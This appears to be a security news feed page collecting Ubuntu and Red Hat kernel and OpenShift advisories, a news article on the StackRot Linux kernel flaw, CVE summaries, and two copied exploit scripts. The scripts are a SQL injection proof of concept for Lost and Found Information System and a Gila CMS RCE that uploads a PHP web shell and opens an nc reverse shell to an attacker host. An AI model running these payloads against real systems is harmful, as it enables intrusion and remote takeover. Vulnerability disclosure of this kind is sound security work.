jSQL Injection is a lightweight application used to find database information from a distant server. jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in various other distributions like Pentest Box, Parrot Security OS, ArchStrike and BlackArch Linux. This is the source code release.

jSQL Injection 0.86

Ubuntu Security Notice 6207-1 - It was discovered that the TUN/TAP driver in the Linux kernel did not properly initialize socket data. A local attacker could use this to cause a denial of service. It was discovered that the Real-Time Scheduling Class implementation in the Linux kernel contained a type confusion vulnerability in some situations. A local attacker could use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6207-1  
July 06, 2023

linux-intel-iotg vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-intel-iotg: Linux kernel for Intel IoT platforms  
- linux-intel-iotg-5.15: Linux kernel for Intel IoT platforms

Details:

It was discovered that the TUN/TAP driver in the Linux kernel did not  
properly initialize socket data. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2023-1076)

It was discovered that the Real-Time Scheduling Class implementation in the  
Linux kernel contained a type confusion vulnerability in some situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2023-1077)

It was discovered that the ASUS HID driver in the Linux kernel did not  
properly handle device removal, leading to a use-after-free vulnerability.  
A local attacker with physical access could plug in a specially crafted USB  
device to cause a denial of service (system crash). (CVE-2023-1079)

It was discovered that the Xircom PCMCIA network device driver in the Linux  
kernel did not properly handle device removal events. A physically  
proximate attacker could use this to cause a denial of service (system  
crash). (CVE-2023-1670)

It was discovered that a race condition existed in the Xen transport layer  
implementation for the 9P file system protocol in the Linux kernel, leading  
to a use-after-free vulnerability. A local attacker could use this to cause  
a denial of service (guest crash) or expose sensitive information (guest  
kernel memory). (CVE-2023-1859)

Jose Oliveira and Rodrigo Branco discovered that the Spectre Variant 2  
mitigations with prctl syscall were insufficient in some situations. A  
local attacker could possibly use this to expose sensitive information.  
(CVE-2023-1998)

It was discovered that the BigBen Interactive Kids' gamepad driver in the  
Linux kernel did not properly handle device removal, leading to a use-  
after-free vulnerability. A local attacker with physical access could plug  
in a specially crafted USB device to cause a denial of service (system  
crash). (CVE-2023-25012)

It was discovered that a use-after-free vulnerability existed in the HFS+  
file system implementation in the Linux kernel. A local attacker could  
possibly use this to cause a denial of service (system crash).  
(CVE-2023-2985)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1033-intel-iotg  5.15.0-1033.38  
   linux-image-intel-iotg          5.15.0.1033.32

Ubuntu 20.04 LTS:  
   linux-image-5.15.0-1033-intel-iotg  5.15.0-1033.38~20.04.1  
   linux-image-intel               5.15.0.1033.38~20.04.24  
   linux-image-intel-iotg          5.15.0.1033.38~20.04.24

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6207-1  
   CVE-2023-1076, CVE-2023-1077, CVE-2023-1079, CVE-2023-1670,  
   CVE-2023-1859, CVE-2023-1998, CVE-2023-25012, CVE-2023-2985

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1033.38

 https://launchpad.net/ubuntu/+source/linux-intel-iotg-5.15/5.15.0-1033.38~20.04.1

Ubuntu Security Notice USN-6207-1

Ubuntu Security Notice 6205-1 - Hangyu Hua discovered that the Flower classifier implementation in the Linux kernel contained an out-of-bounds write vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that for some Intel processors the INVLPG instruction implementation did not properly flush global TLB entries when PCIDs are enabled. An attacker could use this to expose sensitive information or possibly cause undesired behaviors.

    ==========================================================================Ubuntu Security Notice USN-6205-1July 06, 2023linux-gke vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-gke: Linux kernel for Google Container Engine (GKE) systemsDetails:Hangyu Hua discovered that the Flower classifier implementation in theLinux kernel contained an out-of-bounds write vulnerability. An attackercould use this to cause a denial of service (system crash) or possiblyexecute arbitrary code. (CVE-2023-35788, LP: #2023577)It was discovered that for some Intel processors the INVLPG instructionimplementation did not properly flush global TLB entries when PCIDs areenabled. An attacker could use this to expose sensitive information(kernel memory) or possibly cause undesired behaviors. (LP: #2023220)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   linux-image-5.4.0-1103-gke      5.4.0-1103.110   linux-image-gke                 5.4.0.1103.108   linux-image-gke-5.4             5.4.0.1103.108After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6205-1   https://launchpad.net/bugs/2023220   https://launchpad.net/bugs/2023577   CVE-2023-35788Package Information:   https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1103.110

Ubuntu Security Notice USN-6205-1

Red Hat Security Advisory 2023-3924-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.12.23.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.12.23 security update  
Advisory ID:       RHSA-2023:3924-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3924  
Issue date:        2023-07-06  
CVE Names:         CVE-2023-3089  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.12.23 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.12.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenShift Container Platform 4.12 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.12.23. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHSA-2023:3925

Security Fix(es):  
* openshift: OCP & FIPS mode (CVE-2023-3089)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.12 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

4. Solution:

For OpenShift Container Platform 4.12 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

5. Bugs fixed (https://bugzilla.redhat.com/):

2212085 - CVE-2023-3089 openshift: OCP & FIPS mode

6. JIRA issues fixed (https://issues.redhat.com/):

OCPBUGS-15554 - Placeholder bug for OCP 4.12.0 rpm release

7. Package List:

Red Hat OpenShift Container Platform 4.12:

Source:  
container-selinux-2.215.0-1.rhaos4.12.el8.src.rpm  
openshift-4.12.0-202306251254.p0.gc43ddea.assembly.stream.el8.src.rpm  
openshift-ansible-4.12.0-202306230041.p0.g74dc7b3.assembly.stream.el8.src.rpm  
openshift-clients-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el8.src.rpm  
openshift-kuryr-4.12.0-202306230041.p0.g31dd228.assembly.stream.el8.src.rpm  
openshift4-aws-iso-4.12.0-202306230041.p0.gd2acdd5.assembly.stream.el8.src.rpm  
ovn23.06-23.06.0-13.el8fdp.src.rpm

aarch64:  
openshift-clients-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el8.aarch64.rpm  
openshift-hyperkube-4.12.0-202306251254.p0.gc43ddea.assembly.stream.el8.aarch64.rpm  
ovn23.06-23.06.0-13.el8fdp.aarch64.rpm  
ovn23.06-central-23.06.0-13.el8fdp.aarch64.rpm  
ovn23.06-central-debuginfo-23.06.0-13.el8fdp.aarch64.rpm  
ovn23.06-debuginfo-23.06.0-13.el8fdp.aarch64.rpm  
ovn23.06-debugsource-23.06.0-13.el8fdp.aarch64.rpm  
ovn23.06-host-23.06.0-13.el8fdp.aarch64.rpm  
ovn23.06-host-debuginfo-23.06.0-13.el8fdp.aarch64.rpm  
ovn23.06-vtep-23.06.0-13.el8fdp.aarch64.rpm  
ovn23.06-vtep-debuginfo-23.06.0-13.el8fdp.aarch64.rpm

noarch:  
container-selinux-2.215.0-1.rhaos4.12.el8.noarch.rpm  
openshift-ansible-4.12.0-202306230041.p0.g74dc7b3.assembly.stream.el8.noarch.rpm  
openshift-ansible-test-4.12.0-202306230041.p0.g74dc7b3.assembly.stream.el8.noarch.rpm  
openshift-kuryr-cni-4.12.0-202306230041.p0.g31dd228.assembly.stream.el8.noarch.rpm  
openshift-kuryr-common-4.12.0-202306230041.p0.g31dd228.assembly.stream.el8.noarch.rpm  
openshift-kuryr-controller-4.12.0-202306230041.p0.g31dd228.assembly.stream.el8.noarch.rpm  
openshift4-aws-iso-4.12.0-202306230041.p0.gd2acdd5.assembly.stream.el8.noarch.rpm  
python3-kuryr-kubernetes-4.12.0-202306230041.p0.g31dd228.assembly.stream.el8.noarch.rpm

ppc64le:  
openshift-clients-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el8.ppc64le.rpm  
openshift-hyperkube-4.12.0-202306251254.p0.gc43ddea.assembly.stream.el8.ppc64le.rpm  
ovn23.06-23.06.0-13.el8fdp.ppc64le.rpm  
ovn23.06-central-23.06.0-13.el8fdp.ppc64le.rpm  
ovn23.06-central-debuginfo-23.06.0-13.el8fdp.ppc64le.rpm  
ovn23.06-debuginfo-23.06.0-13.el8fdp.ppc64le.rpm  
ovn23.06-debugsource-23.06.0-13.el8fdp.ppc64le.rpm  
ovn23.06-host-23.06.0-13.el8fdp.ppc64le.rpm  
ovn23.06-host-debuginfo-23.06.0-13.el8fdp.ppc64le.rpm  
ovn23.06-vtep-23.06.0-13.el8fdp.ppc64le.rpm  
ovn23.06-vtep-debuginfo-23.06.0-13.el8fdp.ppc64le.rpm

s390x:  
openshift-clients-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el8.s390x.rpm  
openshift-hyperkube-4.12.0-202306251254.p0.gc43ddea.assembly.stream.el8.s390x.rpm  
ovn23.06-23.06.0-13.el8fdp.s390x.rpm  
ovn23.06-central-23.06.0-13.el8fdp.s390x.rpm  
ovn23.06-central-debuginfo-23.06.0-13.el8fdp.s390x.rpm  
ovn23.06-debuginfo-23.06.0-13.el8fdp.s390x.rpm  
ovn23.06-debugsource-23.06.0-13.el8fdp.s390x.rpm  
ovn23.06-host-23.06.0-13.el8fdp.s390x.rpm  
ovn23.06-host-debuginfo-23.06.0-13.el8fdp.s390x.rpm  
ovn23.06-vtep-23.06.0-13.el8fdp.s390x.rpm  
ovn23.06-vtep-debuginfo-23.06.0-13.el8fdp.s390x.rpm

x86_64:  
openshift-clients-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el8.x86_64.rpm  
openshift-clients-redistributable-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el8.x86_64.rpm  
openshift-hyperkube-4.12.0-202306251254.p0.gc43ddea.assembly.stream.el8.x86_64.rpm  
ovn23.06-23.06.0-13.el8fdp.x86_64.rpm  
ovn23.06-central-23.06.0-13.el8fdp.x86_64.rpm  
ovn23.06-central-debuginfo-23.06.0-13.el8fdp.x86_64.rpm  
ovn23.06-debuginfo-23.06.0-13.el8fdp.x86_64.rpm  
ovn23.06-debugsource-23.06.0-13.el8fdp.x86_64.rpm  
ovn23.06-host-23.06.0-13.el8fdp.x86_64.rpm  
ovn23.06-host-debuginfo-23.06.0-13.el8fdp.x86_64.rpm  
ovn23.06-vtep-23.06.0-13.el8fdp.x86_64.rpm  
ovn23.06-vtep-debuginfo-23.06.0-13.el8fdp.x86_64.rpm

Red Hat OpenShift Container Platform 4.12:

Source:  
openshift-4.12.0-202306251254.p0.gc43ddea.assembly.stream.el9.src.rpm  
openshift-clients-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el9.src.rpm

aarch64:  
openshift-clients-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el9.aarch64.rpm  
openshift-hyperkube-4.12.0-202306251254.p0.gc43ddea.assembly.stream.el9.aarch64.rpm

ppc64le:  
openshift-clients-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el9.ppc64le.rpm  
openshift-hyperkube-4.12.0-202306251254.p0.gc43ddea.assembly.stream.el9.ppc64le.rpm

s390x:  
openshift-clients-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el9.s390x.rpm  
openshift-hyperkube-4.12.0-202306251254.p0.gc43ddea.assembly.stream.el9.s390x.rpm

x86_64:  
openshift-clients-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el9.x86_64.rpm  
openshift-clients-redistributable-4.12.0-202306230041.p0.gea7c11a.assembly.stream.el9.x86_64.rpm  
openshift-hyperkube-4.12.0-202306251254.p0.gc43ddea.assembly.stream.el9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

8. References:

https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-001

9. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkpuK2AAoJENzjgjWX9erED1sP/icqm9LST7YtZknWJ1ckfhHB  
AFAHunAp4sIGzfBy85rpka7ZEX8vsWKLnhEFjqGbUvfUzrvMdJSLHXuYriv07094  
6wCPUV09r0b9zj3e6SZugIU91B9xJDn7WOGPilNmfYwmneuZpmJSBPXopOYQX8eP  
F0NehXcRU3I0efeo0pRpzZYxWuRaN6/281qUtMa3FIgrFKZpHe+65IxVhMBsJyul  
gLpYR4S1K3weoYtFUPMgGHHhjgX8hdoF2M8kz+0TKfEoN/B5B+LvL4Qp4WCZW2j3  
3wy85lCZYijCCU+f2jaedumNlvwY26xON9OgUgVs8cIkGe9HhAoxhX5dReOH53h1  
Ay+dxJTgC9pXT0tmlAbGQjUBLAGOMhzGFS+evn45ba+dQurQLKd2u6KaOJvdR9Vn  
ALgovZbHo8UkvLyZYeUEKGn0UMUQlOHkyzdcfGXtJ6QwygrfeGw0QElXJjpJo6ga  
hH4oSMtgQ/w7t74EisUd6myvqvP7BrFgEIiLtpM1DFzNTO7gf3ODOtHuxxsl9SYQ  
FwbG8Xw9xiAhHle+8kFzHhUGvpxf1pIwCwU2oAnZkIbhhLvXC2f9gcEZ3W5i/hwD  
cVb2/fYMYngD/oyI7f334Mm9ujEOquNk503VF/bB0YCAit3widD+weHWAp4Ntlif  
tVVJhSZwStb3jYZaSbtz  
=JF7v  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3924-01

Lost and Found Information System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Lost and Found Information System v1.0 - SQL Injection# Date: 2023-06-30# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : webapps# Dork : /php-lfis/admin/?page=system_info/contact_information# Tested on: Windows/Linux# CVE : CVE-2023-33592import requests# URL of the vulnerable componenturl = "http://example.com/php-lfis/admin/?page=system_info/contact_information"# Injecting a SQL query to exploit the vulnerabilitypayload = "' OR 1=1 -- "# Send the request with the injected payloadresponse = requests.get(url + payload)# Check if the SQL injection was successfulif "admin" in response.text:    print("SQL injection successful!")else:    print("SQL injection failed.")

Lost And Found Information System 1.0 SQL Injection

Gila CMS version 1.10.9 suffers from a remote code execution vulnerability.

    # Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)# Date: 05-07-2023# Exploit Author: Omer Shaik (unknown_exploit)# Vendor Homepage: https://gilacms.com/# Software Link: https://github.com/GilaCMS/gila/# Version: Gila 1.10.9# Tested on: Linuximport requestsfrom termcolor import coloredfrom urllib.parse import urlparse# Print ASCII artascii_art = """ ██████╗ ██╗██╗      █████╗      ██████╗███╗   ███╗███████╗    ██████╗  ██████╗███████╗██╔════╝ ██║██║     ██╔══██╗    ██╔════╝████╗ ████║██╔════╝    ██╔══██╗██╔════╝██╔════╝██║  ███╗██║██║     ███████║    ██║     ██╔████╔██║███████╗    ██████╔╝██║     █████╗  ██║   ██║██║██║     ██╔══██║    ██║     ██║╚██╔╝██║╚════██║    ██╔══██╗██║     ██╔══╝  ╚██████╔╝██║███████╗██║  ██║    ╚██████╗██║ ╚═╝ ██║███████║    ██║  ██║╚██████╗███████╗ ╚═════╝ ╚═╝╚══════╝╚═╝  ╚═╝     ╚═════╝╚═╝     ╚═╝╚══════╝    ╚═╝  ╚═╝ ╚═════╝╚══════╝                              by Unknown_Exploit"""print(colored(ascii_art, "green"))# Prompt user for target URLtarget_url = input("Enter the target login URL (e.g., http://example.com/admin/): ")# Extract domain from target URLparsed_url = urlparse(target_url)domain = parsed_url.netloctarget_url_2 = f"http://{domain}/"# Prompt user for login credentialsusername = input("Enter the email: ")password = input("Enter the password: ")# Create a session and perform loginsession = requests.Session()login_payload = {    'action': 'login',    'username': username,    'password': password}response = session.post(target_url, data=login_payload)cookie = response.cookies.get_dict()var1 = cookie['PHPSESSID']var2 = cookie['GSESSIONID']# Prompt user for local IP and portlhost = input("Enter the local IP (LHOST): ")lport = input("Enter the local port (LPORT): ")# Construct the payloadpayload = f"rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+{lhost}+{lport}+>/tmp/f"payload_url = f"{target_url_2}tmp/shell.php7?cmd={payload}"# Perform file upload using POST requestupload_url = f"{target_url_2}fm/upload"upload_headers = {    "Host": domain,    "Content-Length": "424",    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36",    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarynKy5BIIJQcZC80i2",    "Accept": "*/*",    "Origin": target_url_2,    "Referer": f"{target_url_2}admin/fm?f=tmp/.htaccess",    "Accept-Encoding": "gzip, deflate",    "Accept-Language": "en-US,en;q=0.9",    "Cookie": f"PHPSESSID={var1}; GSESSIONID={var2}",    "Connection": "close"}upload_data = f'''------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="uploadfiles"; filename="shell.php7"Content-Type: application/x-php<?php system($_GET["cmd"]);?>------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="path"tmp------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="g_response"content------WebKitFormBoundarynKy5BIIJQcZC80i2--'''upload_response = session.post(upload_url, headers=upload_headers, data=upload_data)if upload_response.status_code == 200:    print("File uploaded successfully.")    # Execute payload    response = session.get(payload_url)    print("Payload executed successfully.")else:    print("Error uploading the file:", upload_response.text)

Gila CMS 1.10.9 Remote Code Execution

Linus Torvalds led a Linux kernel team in developing a set of patches for the privilege escalation flaw.

Exploit code will soon become available for a critical vulnerability in the Linux kernel that a security researcher discovered and reported to Linux administrators in mid-June.

The bug, which the researcher labeled StackRot (CVE-2023-3269), affects Linux kernel 6.1 through 6.4 and gives attackers a way to escalate privileges on affected systems.

**Affects All Linux Configurations**

Security researcher Ruihan Li of Peking University in China discovered the vulnerability and described it this week as affecting almost all Linux kernel configurations and requiring minimal capabilities to trigger.

A response team, led by Linux creator Linus Torvalds, worked about two weeks on developing a set of patches to address the vulnerability. 

"On June 28th, during the merge window for Linux kernel 6.5, the fix was merged into Linus' tree," Li said in a GitHub post announcing his discovery. "Linus provided a comprehensive merge message to elucidate the patch series from a technical perspective," Li noted.

The patches have since been backported to kernels 6.1.37, 6.2.11, and 6.4.1, "effectively resolving the 'StackRot' bug on July 1," Li wrote. "The complete exploit code and a comprehensive write-up will be made publicly available no later than the end of July."

StackRot pertains to the Linux kernel's handing of stack expansion, a mechanism for automatically growing or expanding the stack memory of a running process.

The data structure for managing virtual memory spaces in the Linux kernel handles a particular memory management function in a manner that results in use-after-free-by-RCU (UAFBR) issues, Li said. UAFBR flaws combine the use-after-free vulnerability with what is known as the Read-Copy-Update (RCU) mechanism in the Linux kernel for synchronizing the use of shared data.

Use-after-free is a type of vulnerability where a software program continues to use a memory reference after it has been deallocated or freed. This gives attackers a way to insert arbitrary code into the freed but still used memory space. "An unprivileged local user could use this flaw to compromise the kernel and escalate their privileges," Li said. The Linux kernel uses the RCU mechanism to free or deallocate used memory space.

While UAFBR vulnerabilities can be dangerous, they are not easy to exploit because of a certain delay that happens with memory deallocation when memory spaces are freed using RCU callbacks, Li explained.

**First-of-Its-Kind Exploit**

The researcher described the exploit for StackRot as likely the first to successfully exploit a UAFBR bug. "To the best of my knowledge, there are currently no publicly available exploits targeting use-after-free-by-RCU bugs," Li said. "This marks the first instance where UAFBR bugs have been proven to be exploitable."

The Linux kernel teams fix for the flaw — led by Torvalds — basically modifies the kernel's user mode stack expansion code to prevent the use-after-free condition from happening.

"It's actually something we always technically should have done," Torvalds said in a GitHub post. "But because we didn't strictly need \[it\], we were being lazy ('opportunistic' sounds so much better, doesn't it?) about things."

StackRot Linux Kernel Bug Has Exploit Code on the Way

An issue was discovered in the USB subsystem in the Linux kernel through 6.4.2. There is an out-of-bounds and crash in read_descriptors in drivers/usb/core/sysfs.c.

CVE-2023-37453

An issue was discovered in the Linux kernel through 6.4.2. A crafted UDF filesystem image causes a use-after-free write operation in the udf_put_super and udf_close_lvid functions in fs/udf/super.c.

CVE-2023-37454

An issue in Zimbra Collaboration ZCS v.8.8.15 and v.9.0 allows an attacker to execute arbitrary code via the sfdc_preauth.jsp component.

Tag

#linux